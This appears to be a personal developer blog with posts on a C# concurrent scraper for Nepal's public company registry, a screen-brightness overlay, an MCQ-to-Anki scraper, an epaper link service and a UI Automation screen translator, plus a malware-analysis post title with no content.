Friday, October 4, 2024

Nepal Companies Scraper

A recent YouTube video led me to this site where we can obtain the details of any company registered in Nepal using its registration number. I found out that the number is enumerable, i.e. you can enter any number in there and, if one or more companies correspond to it, a few details such as the name of the company, established date, address, type and last contact date with the government office are shown. The fact that none of it was available in bulk was a problem I could tackle while getting to learn the latest in parallel programming in C# (it's been a while since I last wrote something in the language, or at least it feels like it). So, a few days ago, I fired up Visual Studio and created a new console app targeting .NET 8 - the latest and greatest of the framework.

The first order of business was obviously to figure out the back-end API calls made by the webpage's interface upon clicking the Search button. Chrome devtools were as helpful here as always. I identified four different form parameters for the POST request's body and the cookie that needed to be set in the header. I made it work manually in Postman, then coded it up as simply as I could in C# - first using a plain for loop. I had to make it work sequentially before I could move on to multi-threading/concurrency, and it did work really well. But of course, the speed wasn't all that great. Each POST request took around 130 ms, so probing 1 million registration numbers sequentially would have taken a day and a half or so of nonstop requests. Obviously, I wanted to do it faster, and I knew there was something that the much acclaimed TPL (Task Parallel Library) of the .NET/Framework ecosystem could do here.

I had used threads (extensively) before, and the threadpool's higher-level methods for queuing up blocks of code to be executed by whatever threads become available. However, I had never had to dive into the depths of the TPL. Tasks were still relatively new to me. Sure, I knew how to use methods that returned them, await them and so on, but I had never felt a need to do Task-based (which I now know is _somewhat_ synonymous with asynchronous) programming. Most things I've done are CPU-heavy (if that) rather than extensively network/filesystem-oriented. So it makes sense, with the luxury of hindsight, that I was able to coast through my C# journey up to this point without having to learn much about handling repeated, inherently I/O-bound operations that require the program to wait for a response from an external source, such as HTTP requests. I could probably have put together something using plain old threads that performed somewhat close to the optimum achievable with the TPL (basically partition the full range and synchronize the threads), but I wanted to learn this new thing.

So, the first thing I tried was the humble yet powerful Parallel.For() loop. The only experience guiding me about this beast was that one time when I had written a prime number finder to compare the number-crunching speeds of C#, Java and C - Parallel.For() had wiped the floor back then. So, I was pretty confident that it would do great this time as well. Upon giving it a whirl, I found a few problems with it. First, there were an unacceptably large number of failed probes; it looked like the server was unable to serve however many threads it spun up. Second, my CPU was being utilized like crazy for what little the loop actually delivered. I now know that Parallel.For() doesn't do a great job of working with asynchronous operations. At first glance it seems reasonable: the HTTP requests fired in each iteration/thread are inherently blocking (and I did not write the request code in the idiomatic asynchronous style using await on every async method such as httpClient.GetAsync(); instead I was calling .Result and blocking the thread entirely - I did not know the difference!), so of course it makes sense for another thread to start while one is blocked. However, I later learned that that is not the best way to maximize simultaneous requests.
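For context, here's roughly the shape of that first naive attempt - a minimal sketch, with the URL, form field and method names being placeholders rather than the actual code in the repo:

`
// Rough sketch of the naive Parallel.For() attempt (illustrative only).
using System.Collections.Concurrent;

var httpClient = new HttpClient();
var companies = new ConcurrentBag<string>();

Parallel.For(1, 1_000_001, new ParallelOptions { MaxDegreeOfParallelism = 4 }, regNum =>
{
    // .Result blocks the worker thread for the entire duration of the request,
    // which is exactly what starves the thread pool and wastes CPU.
    var response = httpClient.PostAsync("https://example.org/search",
        new FormUrlEncodedContent(new Dictionary<string, string> { ["regNum"] = regNum.ToString() })).Result;

    var body = response.Content.ReadAsStringAsync().Result;
    if (body.Contains("companyName"))   // placeholder check
        companies.Add(body);
});
`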
Just increasing the number of threads does not automatically mean better "throughput" (how many registration numbers get probed at a time), because a) the server might not allow too many simultaneous requests from the same IP, and b) the threads are getting blocked for no good reason (this is with the .Result approach), tying up precious CPU resources that could be doing actually useful work. Now I realize that both these drawbacks of the naive Parallel.For() approach could be mitigated by wrapping the work in Tasks inside the parallelized block and using locking mechanisms such as semaphores, but that's a bit of a hack. While I have explained the cons of Parallel.For() with what I now know, back when I was actually testing it out I did not bother getting into the weeds at all - I just knew that Parallel.For() wasn't working. Every internet search on "C# web scraping simultaneous requests" was yelling that Parallel.For() is for CPU-bound operations, whereas I/O-bound operations such as network requests are better served by concurrent asynchronous programming, namely Task.WhenAll(). So, that's where I went next.

The approach with Task.WhenAll() is that you build a deferred LINQ query that, when enumerated, creates a Task for each registration number. It goes like: Enumerable.Range(1, 1_000_000).Select(async i => await YourHttpRequestMethodAsync(i))

The above (pseudo)code basically maps each number from 1 to 1M to a separate asynchronous lambda that checks for companies corresponding to the given registration number (and does some side effect like updating a ConcurrentBag or whatever). The result is an IEnumerable of Tasks that can be awaited together using Task.WhenAll(). Of course it's possible to do it with a simple for loop instead, generating a new Task for each invocation of YourHttpRequestMethodAsync(), but the above method appears to be more established because it doesn't actually create all the Tasks up front - it only gives an IEnumerable, not a List or some other collection that would hold them all in memory for no good reason most of the time - but that's a secondary point here. Okay, enough tangents!

Now, this method worked great. The suggested way to limit concurrency here is to use a form of shared lock, specifically a Semaphore or SemaphoreSlim, before the actual invocation of YourHttpRequestMethodAsync(), so that only a defined number of tasks are active at any given time. Of note here is that a running Task is different from a running Thread, something I found intriguing (and something I'm still not totally clear on even now). The same thread may be home to different tasks, and a task may run on different threads. It's all handled by the runtime, and as you can see, it's a higher-level abstraction than threads. That, I suspect, is also what allows it to be so performant with so little effort from the developer's standpoint (the runtime, I'm sure, needs to do a lot more gymnastics here than when just using threads).

I let my code run with this approach overnight, and in about 6 hours it had processed all 1 million registration numbers and yielded just under 400k companies. By this point, I had also graduated from collecting all the harvested companies in memory and dumping them once the whole process ended, to writing them in batches to a SQLite DB. For that, I wrote another class called DBStore to handle inputs from multiple threads, report metrics on its internal queue size and fill and drain rates, modulate the offloading rate from the queue efficiently, and so on - but that's a whole other discussion, one I'm omitting here since much of the code is self-documenting and the class is heavily commented. Suffice it to say, this mini-project was mostly complete. However, Visual Studio's IntelliSense had shown me another Parallel.For-like method, Parallel.ForAsync(). Given that I had seen discussions on the internet (mostly StackOverflow) regarding Parallel.ForEachAsync(), I was curious how well ForAsync() would work. So, that's what I tried next.
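Before getting to that, here's roughly what the Task.WhenAll() + SemaphoreSlim combination looks like when put together - again a minimal sketch with placeholder names; the real implementation (per-task HttpClient, retries, DBStore) is in the repo:

`
var throttler = new SemaphoreSlim(50);   // at most ~50 in-flight requests (an arbitrary number)

var tasks = Enumerable.Range(1, 1_000_000).Select(async regNum =>
{
    await throttler.WaitAsync();
    try
    {
        await YourHttpRequestMethodAsync(regNum);
    }
    finally
    {
        throttler.Release();
    }
});

await Task.WhenAll(tasks);

// Placeholder for the real probe: POST the form, parse the response, store any hits.
async Task YourHttpRequestMethodAsync(int regNum) => await Task.Delay(10);
`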

Parallel.ForAsync() is a brand new method, only added with .NET 8 back in November of 2023. But I was targeting .NET 8 - the latest and the greatest - so I had no concerns. While Parallel.For() doesn't natively understand the asynchronous programming model (an asynchronous block of code given to it won't execute the way one might expect unless you wrap it in a Task as a workaround), ForAsync() was built for exactly this purpose. You can plop in the same async i => await YourHttpRequestMethodAsync(i) lambda you used for Task.WhenAll(), without any change, and it works just fine. The upside is that you don't need to manually create semaphore locks or bother with building an enumerable of Tasks. You simply control the "degree of parallelism" (note the level of abstraction in the terminology, which I think is telling) using ParallelOptions and MaxDegreeOfParallelism (passed in as an argument to the method), and the runtime does the rest. It's not all that different from Task.WhenAll(), but it feels like the proper way to do something like this - it handles CPU-intensive work just as the regular Parallel.For() would, while giving first-class support to asynchronous operations such as network requests. Performance-wise, comparing the two methods, I felt like I could push Parallel.ForAsync() harder than Task.WhenAll(), even when the latter had no SemaphoreSlim limit on concurrency at all; Task.WhenAll() seemed pretty self-balancing, self-limiting and generally robust. Contrast this with Parallel.ForAsync()'s MaxDegreeOfParallelism, where it was obvious that it was much easier to overdo the "parallelism" and get throttled right away. For the actual numbers (I ran a few simple tests for a period of 2 minutes using the two approaches), take a look at my repo.
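And a matching sketch of the ForAsync() version, with the same placeholder probe method:

`
var options = new ParallelOptions { MaxDegreeOfParallelism = 16 };   // an arbitrary number

await Parallel.ForAsync(1, 1_000_001, options, async (regNum, cancellationToken) =>
{
    await YourHttpRequestMethodAsync(regNum);
});

// Placeholder probe method, as before.
async Task YourHttpRequestMethodAsync(int regNum) => await Task.Delay(10);
`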

There are more details in the readme file in my repo, such as the interesting problem of registration numbers and company mixups due to shared instances of HttpClient (with the same jsession cookie) being used in multiple threads at the same time, how the overall network speed plays a bigger role than the specific parallel programming technique used, and so on.

Here's the rough MDD (Musings During Development) I jotted down throughout this project:

naive parallel.for loop was implemented without allowing for server-side rate limits/timeouts. performance was poor. the same HttpClient instance with the same jsession cookie was utilised for all parallel iterations, so likely caused server-side session mixups leading to the wrong companies being reported for a requested regNum. also, lots of failed regNums (851744) for 154875 harvested companies at the end. ran overnight, about 12 hours for probing regNums 1 to 1 million. this was with MaxDegreeOfParallelism set to 4. had tested it out with many numbers including no limits. no limits mode basically led to instant request denials. higher numbers led to extremely low yields (harvested:tested ratio). so settled on 4. even then, unsatisfactory performance, as mentioned above.


in about 2 hours, harvested companies stabilised at 339489 using task.whenall(). stabilisation due to no company details being available for queried regNum. rate started out at around 1000 regNums processed (and an equal no. of harvested companies, with no failed regNums) per 10 seconds and slowly dropped to around 500 per 10 seconds prolly due to server-side throttling. failed regNums caused only due to server-side issues/throttling. for about 424k tested regNums, 700 failed regNums. very gradual rise in failed regNums. this approach applied the instantiation of a brand new HttpClient on every task to avoid potential server-side jsession mixups. this approach also has exponential back-off in case of timeouts and 3-times retry logic. processed 999815 regNums in 6 hours. as for the code, i noticed no difference between giving .Select() an async lambda or a normal sync lambda.


12648 harvested in 120 seconds using sqlite offloading (dynamic rate)


354862 harvested in 19785 seconds using sqlite offloading with simple sleep method. 519 failed regNums.


Note: I stopped at 1 million because I wasn't getting any hits after around the 330k mark of harvested companies (which normally got reached at around the 2 hour mark using either of the two techniques - probing the whole 1 million took another 4 hours of course, just without many results).

Wednesday, July 31, 2024

ConstDisp

With dark themes nearly everywhere these days, I have been noticing that my eyes have a hard time whenever I see white/near-white renderings on my screen, whatever the specifics (webpages, native applications, videos, etc.). I wanted a program that would automatically adjust the screen brightness to match a target I specify. ConstDisp is the result. I first fiddled with a few WMI queries that actually change the screen brightness, as one would do using, say, a keyboard combination (on laptops anyway; I'm not sure that works with most external monitors), but I ditched that idea because it didn't feel granular enough, nor did it seem like it would work with all display hardware. This program works by cheating. All it does is create a topmost window whose background color we choose and whose opacity we modulate to achieve a user-specified target for the "average brightness" of the screen. That's mostly it. Of course, the way it calculates "average brightness" is arbitrary, but it's good enough for me. This quantity is simply the mean of all red, green and blue channel values of the pixels of the screen. There could be other ways to get this metric, but that's how it's done right now. I wanted to do something open source in C++, so that's the language I chose; for the GUI, I used my SimWin library. In the process, I added to SimWin a few more features that this project needed.
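The actual program is C++ on top of SimWin, but the core feedback loop is simple enough to sketch. Here's a rough, conceptual version in C# (WinForms/System.Drawing), purely to illustrate the idea - the names, sampling stride and step factor are all made up:

`
using System;
using System.Drawing;
using System.Windows.Forms;

// Conceptual sketch only - the real ConstDisp is C++ on top of SimWin.
// "overlay" is assumed to be a borderless, topmost, click-through Form filled with the chosen color.
static class BrightnessLoop
{
    // The "average brightness" metric: the mean of all R, G and B values (sampled every 8th pixel here).
    public static double MeasureAverageBrightness()
    {
        Rectangle bounds = Screen.PrimaryScreen.Bounds;
        using var bmp = new Bitmap(bounds.Width, bounds.Height);
        using (var g = Graphics.FromImage(bmp))
            g.CopyFromScreen(Point.Empty, Point.Empty, bounds.Size);

        long sum = 0;
        int count = 0;
        for (int y = 0; y < bmp.Height; y += 8)
            for (int x = 0; x < bmp.Width; x += 8)
            {
                Color p = bmp.GetPixel(x, y);
                sum += p.R + p.G + p.B;
                count += 3;
            }
        return (double)sum / count;   // 0..255
    }

    // Called periodically (e.g. from a timer): nudge the overlay's opacity toward the target.
    public static void NudgeOverlay(Form overlay, double target)
    {
        double error = MeasureAverageBrightness() - target;
        // Screen too bright -> make the dark overlay more opaque; too dim -> less opaque.
        overlay.Opacity = Math.Clamp(overlay.Opacity + error * 0.002, 0.0, 0.95);
    }
}
`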

Creating the GUI for the program was not fun (really missed C#'s RAD) but implementing the core functionality was, and I got to learn a lot about the language.

Here's a screenshot:




Here's the repo and the binary.

Note: There's no app icon, so it appears as a generic executable. The language standard used here is C++14, but most modern Windows systems should have no problem running the statically linked binary.

Wednesday, May 29, 2024

MCQ Scraper

This is a simple .NET 8 console application that scrapes MCQs from different online sources and consolidates them into a single SQLite DB. Check the schema of the table in the attached picture below.

Currently, it only collects Civil Engineering-related questions from IndiaBix for a select few categories, but this can be extended to other sources as well.

The program itself is pretty brittle in its current state - no allowance has been made for exceptions that I didn't encounter during development. Logging is a pretty basic custom implementation as well, and it was an afterthought (the log file is opened and written to every time a new line is logged, so be sure to disable it if you feel it hitting performance too much). Still, in its current form, the whole operation completed in a matter of a couple of minutes.

Regarding dependencies, it uses simple regex matching when possible, and HtmlAgilityPack for parsing the scraped HTML pages into manageable DOMs for easier filtering.
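As an illustration of the HtmlAgilityPack side of it, here's a minimal sketch - the URL and the XPath class name are placeholders, not the actual selectors used in the repo:

`
using HtmlAgilityPack;

var web = new HtmlWeb();
// Example category URL; the real list of categories is configured in the repo.
HtmlDocument doc = web.Load("https://www.indiabix.com/civil-engineering/building-materials/");

// Placeholder XPath - the actual node classes/structure are handled in the repo.
var questionNodes = doc.DocumentNode.SelectNodes("//div[contains(@class, 'question-container')]");
if (questionNodes != null)   // SelectNodes() returns null (not an empty list) when nothing matches
{
    foreach (var node in questionNodes)
    {
        string questionHtml = node.InnerHtml;                              // keep HTML (needed for <img> etc.)
        string questionText = HtmlEntity.DeEntitize(node.InnerText).Trim();
        // ... extract options/answer with further SelectSingleNode() calls or Regex, then insert into SQLite
    }
}
`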

The resulting output DB file is available here.

Console output from the program in action


Top few entries from the output DB


UPDATE (31 May, 2024):
I've worked in a few improvements to the program and pushed the code changes to the repository. Now, it can also create Anki flashcards, so that the scraped content is actually useful. Equally importantly, there's a bugfix/QoL enhancement: <img> tags are now also checked for in the question texts/prompts - a possibility I had ignored before - and the referenced images are downloaded, base64-encoded and replaced in place, ready for use in HTML as-is.

For the past day or two, I was wondering if I should create a separate app (I was thinking maybe a Vue-powered SPA) to actually make use of the DB; but a couple of hours' worth of internet research led me to believe that it would be a lot more efficient to make this DB available to Anki instead of reinventing the wheel all over again. Oh, and this apparently really popular app was first brought to my attention by ChatGPT-4o when I asked it "what is the best strategy to memorize around 4500 mcqs for a competitive exam?" Anki was literally the first option in the list it returned, where it suggested using it as a Spaced Repetition System (SRS) for "active learning". I had to download and play around with it for a bit before I could actually understand its workings.

I also searched for any and all add-ons the Anki community had for multiple choice questions and tried one or two of them. But I didn't really like them much - and I didn't know how I could export the questions from the DB into a form that these add-ons would understand either. So, taking the advice of a wise Reddit user somewhere, I ditched the idea of using any sort of add-on for MCQs altogether and began exploring the import and export format used by Anki. It turns out the program can import/export in a few different formats, but I chose the simple plaintext format for obvious reasons and studied its structure. I created a new default deck - a term I have gathered means a collection of cards sharing some similarity; so in this case, a deck can represent a category, such as building-materials, or surveying, etc. Then I created two cards manually from inside Anki, each one following the pattern of the question prompt and the multiple options on the front side and the answer on the back side of the card. This is also where I learned that Anki has first-class support for HTML in its flashcard contents, which was perfect for me since I didn't have to worry about all the tags in my scraped questions and options, not to mention the <img> tags.

Anyway, I then exported the cards from Anki's File menu (still not sure if it exports just a single deck or all of them to the same file) to a plaintext file and studied the structure of the exported file. It was really intuitive, and I figured it would be easy enough to automate converting the questions from my scraped DB into this format that Anki understood (I had also successfully tried externally modifying the export file and importing it back into Anki, without any hiccup). So, that's what I did. I simply added a class library project to the Visual Studio solution and added the functionality to produce ready-to-import Anki plaintext files from the SQLite DB produced by MCQer (a rough sketch of the conversion is at the end of this post, after the screenshots). And voila:

The *.txt files are the import-ready Anki plaintext files produced by our program

Confirming an import in Anki

Browsing the imported deck of cards (notice the images)

Another file, another deck of cards imported

A flashcard, when in action
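For the curious, the conversion itself boils down to writing tab-separated front/back fields into a text file. A minimal sketch follows - the field handling and file name are made up, and the header lines are what a recent Anki version writes in its own exports, so double-check against whatever your version produces:

`
using System.Text;

// Minimal sketch of turning DB rows into an Anki-importable plaintext file.
static void WriteAnkiFile(string path, IEnumerable<(string QuestionHtml, string OptionsHtml, string AnswerHtml)> notes)
{
    var sb = new StringBuilder();
    sb.AppendLine("#separator:tab");   // header directives as seen in a recent Anki export
    sb.AppendLine("#html:true");

    foreach (var (question, options, answer) in notes)
    {
        // Front = question + options, Back = answer. Tabs/newlines inside a field would break
        // the format, so strip or encode them first.
        string front = $"{question}<br>{options}".Replace("\t", " ").Replace("\n", " ");
        string back  = answer.Replace("\t", " ").Replace("\n", " ");
        sb.AppendLine($"{front}\t{back}");
    }

    File.WriteAllText(path, sb.ToString(), Encoding.UTF8);
}
`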

Sunday, February 4, 2024

Gorkhapatra By Date

I used to visit the official Gorkhapatra epaper site and download the latest epaper to see if there were any PSC vacancies, up until a few months ago. I eventually stopped doing that, but until then, for about two years, every day, I downloaded the daily epaper and uploaded it to DriveHQ. I had managed to exhaust two entire accounts' worth of storage with just Gorkhapatra pdf's. One thing I felt was lacking in the site was the ability to download epapers older than 1 week, and the system was generally clunky and unreliable. So, this is why Gorkhapatra By Date was conceived.

Initially I had thought that I had to save the actual pdf's, because I wasn't sure the links would be valid past the 1-week-old mark but as I've learned in the past two weeks of developing this service, they are. So, I decided to just save the available links and do away with downloading the actual files.

Architecture-wise, the service is really simple. It's made up of two parts, one of which is just a CodeIgniter-based API server that retrieves the link to the epaper for the requested date, if present of course, from a table in the database. It also has another endpoint that simply lists the available dates. The links themselves are scraped from the original epaper site using a simple PHP script running as a cron job every 6 hours and the table is updated with any new link available. The script could technically be run just once a day typically a few tens of minutes past 12 AM (I've observed over the years that that's around the most likely time of upload of the day's paper to the site, though not always) but I've learned not to rely on this pattern.

The cron script doesn't just scrape the links and blindly insert them into the DB's table either. The links present on the original site are not direct links to the pdf's; however, the direct links are readily available with some simple URL string manipulation, so it does that as well.

Also, since we need to be sure which date each pdf belongs to, we cannot just rely on the file name of the pdf (which is supposed to be a combination of the English and the Nepali dates of the day, but is very often wrong). As a solution, we actually download the pdf's and parse them (using smalot's pdf parser library for PHP) to obtain their metadata. Even after going through all this, the date specified in the metadata isn't always reliable. So, we perform regex pattern matching on the first page of each pdf after it's been parsed by the library. Only then do we have a reliable date for each file (unless the pattern of the date printed in the pdf changes as well, in which case we'll need to update our regex).

The parsing itself turns out to be really CPU-intensive (the script finished parsing 8 pdf's comfortably within a minute on my local machine, while it easily took 25-30 on my shared hosting server), but memory is where I hit a wall. Turns out, one of the pdf's was 22 pages, and a simple memory_get_usage() call logged in the script after the call to the parser revealed that the script was eating up ~170MB of memory for that file. My shared hosting config was set to 128MB per script, so, as expected, the script crashed upon reaching this particular pdf among the scraped list of 8: "Fatal Error: Allowed Memory Size of 134217728 Bytes Exhausted ...". Turns out, in a shared hosting environment, modifying the php.ini file isn't possible. Thankfully, cPanel did have a page where I could change a bunch of different PHP parameters, including memory_limit, which was initially set to 128MB and which I promptly set to 512MB (the same as my development environment in XAMPP). Side note: I learnt after much back and forth with the hosting support that the change from cPanel modifies, to my utter befuddlement initially, not the php.ini file (which, as they pointed out, is global across the server and is set to 128MB) but the httpd.conf file (which is separate for each user account on the server), and that takes precedence over php.ini. The memory limit set inside a script has the highest precedence, then the httpd.conf file, only then followed by php.ini. I also learned about the php --ini and php --info commands and the phpinfo() function. The first tells you where the php.ini file that the currently installed PHP binary is configured to use is located, the second gives you the actual PHP configuration values including memory_limit, and the third is just the PHP function that does the same. Neat stuff.

Okay, once we have the date and the link for all the available epapers we scraped (usually 8), we just insert them into the table and let MySQL handle the duplicates.

The front end is hosted on the main domain (ajashra.com) while the API server resides in a subdomain (api.ajashra.com), so the API server needs to allow CORS with the Access-Control-Allow-Origin header set to "https://ajashra.com". This was new for me and it took about half a day to fully iron out using the "before" filter feature in CodeIgniter4. Some cool stuff I learned there. The Same Origin Policy that necessitated this is only enforced by web browsers, so, while calling the API from front-end code from an origin other than the main domain will fail, the API still works for any non-web-browser consumer.

The JS library "Vanilla Calendar" is used on the front-end to present an intuitive calendar interface where a user can see which dates are available for download. Clicking any available date on the calendar directly downloads the corresponding epaper.


Here's the URL for the service.

Wednesday, September 6, 2023

ScreenTranslator

At work, I have to work with QQ, an instant messaging program that comes in an international version and a Chinese version. For the Chinese version of the app, I mostly have to rely on Google Lens to translate the UI to English.

So, about 3-4 days ago, I thought: why not make a desktop program to do the translation instead of having to open Google Lens on my phone every time I want to make sense of a weird menu item in QQ's UI? This is my attempt at that. All it does is iterate through the automation/accessibility elements in the app, get English translations for each element's text and create an overlay window with the translated text right over it. I first wanted to use Google's Translate API, but that seems to require a credit card even for the free tier, so I settled for a free API that uses LibreTranslate. The translations are not as good as Google Translate, but one can make out the meaning with some deliberation.
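The actual project goes through the CUIAutomation COM wrapper, but the gist of the element-walking step looks roughly like this with the managed System.Windows.Automation API instead (a sketch, not the project's code):

`
using System;
using System.Collections.Generic;
using System.Windows;                  // Rect
using System.Windows.Automation;       // reference UIAutomationClient + UIAutomationTypes

static class ElementWalker
{
    // Collect the name and bounding box of every descendant element of a window.
    // The real program then sends each text off for translation and draws an overlay on top of it.
    public static List<(string Text, Rect Bounds)> CollectTexts(IntPtr hwnd)
    {
        var results = new List<(string Text, Rect Bounds)>();
        AutomationElement root = AutomationElement.FromHandle(hwnd);

        foreach (AutomationElement element in
                 root.FindAll(TreeScope.Descendants, Condition.TrueCondition))
        {
            string name = element.Current.Name;
            if (!string.IsNullOrWhiteSpace(name))
                results.Add((name, element.Current.BoundingRectangle));
        }
        return results;
    }
}
`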

UI of the program

UI of the program during the translation process

QQ's menu before translation

QQ's menu after translation

The operation of the program is simple: middle-click on any window to translate the texts in it. Move your cursor to the top-left corner of your screen to remove all translation overlays.

The program doesn't work for entire webpages, because webpages tend to have a lot of elements to process (in my case, with multiple tabs open and one of them being a Chinese site, I counted over 10k elements). The C# library I've used here for automation element extraction simply doesn't care for that many elements and returns empty. It should work in scenarios with a limited number of elements, such as software programs whose UI is in a foreign language.

Here's the GitHub repo and here's the release

Here's the MDD:

Musings During Development of ScreenTranslator:

------------------------------------------------


Don't ever create Forms on multiple threads. Use the main UI thread for all your window needs. You'll save a lot of headaches this way. I'd tried creating the translation overlays in a separate thread for each new overlay but faced problems such as: residual windows when the thread they were created on was aborted (meaning I would have to interact with the overlays to get rid of them); design questions around how best to close the overlay windows (abort the threads they were created on, or make the overlay forms themselves listen to a flag? do I create a new window using .Show() followed by Application.Run(), or .ShowDialog()? and why? - at any rate, when a thread was aborted externally, the ThreadAbortException would only be triggered inside it when the cursor was placed over its overlay, not immediately); some translations being randomly missed for whatever reason; and so on.

Just do whatever processing actually made you take the multi-threading route in different thread(s), and leave the UI/form creation logic to the main UI thread. this.Invoke() and this.BeginInvoke() are your friends. All of the problems I described above went POOF when I did that. Countless StackOverflow posts recommend exactly this, and not without reason. If you're creating forms in separate threads, re-think your design. You will probably make it far simpler and solve most of your problems by leaving UI operations (and that includes new form creation) to the main UI thread.
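A sketch of what that ends up looking like (OverlayForm being a stand-in name for whatever borderless form shows the translated text):

`
// Inside the main Form class. Called from a worker thread once a translation result is ready.
void ShowOverlay(string translatedText, Rectangle bounds)
{
    this.BeginInvoke((Action)(() =>
    {
        // Construction and Show() both happen on the UI thread, so the overlay lives on the
        // main message loop - no orphaned windows when the worker thread goes away.
        var overlay = new OverlayForm(translatedText, bounds);
        overlay.Show();
    }));
}
`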


.NET forms' TopMost property is crap, like a lot of other things (the managed Automation API comes to mind, because it's also something relevant to this project - or I should say, something I've avoided in favor of the native automation API wrapper, CUIAutomation). Just use the native Win32 API: SetWindowPos() with the right params.
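The P/Invoke version of that call, for reference - the flag combination here is just what I'd typically reach for, adjust to taste:

`
using System;
using System.Runtime.InteropServices;

static class TopMostHelper
{
    [DllImport("user32.dll", SetLastError = true)]
    static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter,
                                    int X, int Y, int cx, int cy, uint uFlags);

    static readonly IntPtr HWND_TOPMOST = new IntPtr(-1);
    const uint SWP_NOSIZE     = 0x0001;
    const uint SWP_NOMOVE     = 0x0002;
    const uint SWP_NOACTIVATE = 0x0010;
    const uint SWP_SHOWWINDOW = 0x0040;

    // Forces a window into the topmost band without moving, resizing or activating it.
    public static void MakeTopMost(IntPtr hwnd) =>
        SetWindowPos(hwnd, HWND_TOPMOST, 0, 0, 0, 0,
                     SWP_NOMOVE | SWP_NOSIZE | SWP_NOACTIVATE | SWP_SHOWWINDOW);
}
`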


September 4, 2023 | 08:24 PM

-----------------------------

During automation tree iteration, you won't see what's not visible. I was trying to get all descendants of a web browser (Firefox) to see if my tool could translate entire webpages, but it didn't work. Investigating, I found that the CUIAutomation library was flat-out returning null from the FindAll() method when given the IUIAutomationElement returned from a call to ElementFromHwnd() (with the hwnd obtained by the WindowFromPoint() API applied to the value returned by GetCursorPos()). To figure out what was happening, I opened Spy++ to see if I was getting the right hwnd, and I found that the hwnd I had obtained from WindowFromPoint() was a child of a parent hwnd for Firefox. I then got that parent hwnd and tried FindAll() with descendants as the TreeScope, but I was still getting empty or null results. Then I thought to myself that the CUIAutomation library must be at fault here - after all, FindAll() with descendants is a very taxing operation, as MSDN suggests. So, I made a fully functional program for the same in C++:

`

#include <iostream>
#include <Windows.h>
#include <UIAutomationClient.h>
#include <vector>

IUIAutomation* g_pAutomation;

void doItFaster();
std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element);
std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement);

int main()
{
    std::cout << "Hello World!\n";
    doItFaster();
}

void doItFaster() {
    // Throwaway test program: COM interfaces are deliberately never Released here.
    HRESULT _ = CoInitialize(NULL);
    if (_ == S_OK || _ == S_FALSE) {
        HRESULT hr = CoCreateInstance(__uuidof(CUIAutomation), NULL, CLSCTX_INPROC_SERVER,
                                      __uuidof(IUIAutomation), (void**)&g_pAutomation);

        HWND hWndFirefox = (HWND)0x0006009E; // hard-coded Firefox top-level hwnd, looked up at the time
        IUIAutomationElement* pBrowserElement;
        if (g_pAutomation->ElementFromHandle((UIA_HWND)hWndFirefox, &pBrowserElement) == S_OK) {
            IUIAutomationCondition* iUIAutomationCondition;
            if (g_pAutomation->CreateTrueCondition(&iUIAutomationCondition) == S_OK) {

                IUIAutomationTreeWalker* pAutomationTreeWalker;
                if (g_pAutomation->get_ContentViewWalker(&pAutomationTreeWalker) == S_OK) {

                    auto leafElements = GetDescendants(pBrowserElement); // watch this

                    std::vector<std::wstring> leafElementNames;
                    for (auto leafElement : leafElements) {
                        BSTR name;
                        if (leafElement->get_CurrentName(&name) == S_OK && name != NULL) {
                            leafElementNames.push_back(std::wstring(name, SysStringLen(name))); // and this
                        }
                    }

                    int x = 0; // bp here
                }
            }
        }
    }
}

// Recursively collects the leaf elements under the given element.
std::vector<IUIAutomationElement*> GetDescendants(IUIAutomationElement* element)
{
    std::vector<IUIAutomationElement*> leafElements;

    auto children = GetChildren(element);

    if (children.size() == 0) { // this is a leaf element
        leafElements.push_back(element);
    }
    else {
        for (auto child : children)
        {
            auto descendants = GetDescendants(child);
            leafElements.insert(leafElements.begin(), descendants.begin(), descendants.end());
        }
    }

    return leafElements;
}

// Returns the immediate children of the given element using a TrueCondition FindAll().
std::vector<IUIAutomationElement*> GetChildren(IUIAutomationElement* parentElement) {
    std::vector<IUIAutomationElement*> retval;

    IUIAutomationCondition* trueCondition;
    g_pAutomation->CreateTrueCondition(&trueCondition);

    IUIAutomationElementArray* children;
    if (parentElement->FindAll(TreeScope_Children, trueCondition, &children) == S_OK) {
        int numberOfChildren;
        if (children->get_Length(&numberOfChildren) == S_OK) {
            for (int i = 0; i < numberOfChildren; i++) {
                IUIAutomationElement* child;
                if (children->GetElement(i, &child) == S_OK) {
                    retval.push_back(child);
                }
            }
        }
    }

    return retval;
}


`

It took doing all this to bring me to the realization that the web browser needed to be almost completely visible, i.e. not blocked by any other window, for the element extraction to work. My Visual Studio 2019 IDE was most definitely blocking the browser window while the program was running.

ref: https://stackoverflow.com/questions/69122441/uiautomation-missing-to-catch-some-elements

There's no need to write my own custom FindAll-descendants method with recursion like I did in the C++ version above. The built-in FindAll() with the descendants TreeScope works just fine. I only did what I did because I thought the stack was overflowing or something.

Also, the hwnd to use for the parent element in FindAll() is not necessarily what WindowFromPoint() gives you. You need to get the top-level parent window of that API call's output to be sure. The raw hwnd might work for apps such as QQ (in my case, it worked perfectly fine with QQ, but it clearly didn't when I tried translating a Chinese website, which is what led to all of this), but it doesn't work for all windows, especially web browsers.


September 5, 2023 | 03:39 PM

----------------------------

Turns out, the FindAll() method provided by the IUIAutomation C# NuGet package doesn't give results (i.e. gives a 0-length IUIAutomationElementArray) if there's a large number of elements. I tried parsing a Firefox webpage browsing csdn.com - a Chinese-language site - and the C++ code above (my own version of FindAll() for getting all descendants) took around 30s but returned over 10k elements. Doing FindAll() with the descendants TreeScope in C# for the same hwnd/element immediately returned a length of 0 (not null, but an IUIAutomationElementArray with length 0). Maybe porting the C++ version of GetDescendants() to C# by manually recursing through all immediate children would work there as well, but I'm not going to do it. Just don't use it on websites.

For the Brave browser with my Outlook open in a tab, both the default FindAll() descendants in C# and the C++ version work just fine, and there are around 370 elements.


September 6, 2023 | 11:50 AM

------------------------------

https://stackoverflow.com/questions/13225841/starting-application-on-start-up-using-the-wrong-path-to-load

When running on user logon (via HKCU Run entry), the working directory is not the application exe location. So, file paths that haven't been fully qualified don't work.
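The straightforward fix, sketched out (the file name is just an example; AppContext.BaseDirectory works in both .NET Framework 4.6+ and modern .NET, and Application.StartupPath is the WinForms equivalent):

`
// The working directory under an HKCU Run launch is not the exe's folder,
// so resolve files relative to the executable's own location instead.
string baseDir = AppContext.BaseDirectory;                    // or Application.StartupPath in WinForms
string settingsPath = Path.Combine(baseDir, "settings.json"); // "settings.json" is just an example name
`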

 

Thursday, July 13, 2023

ScrubCrypter malware analysis

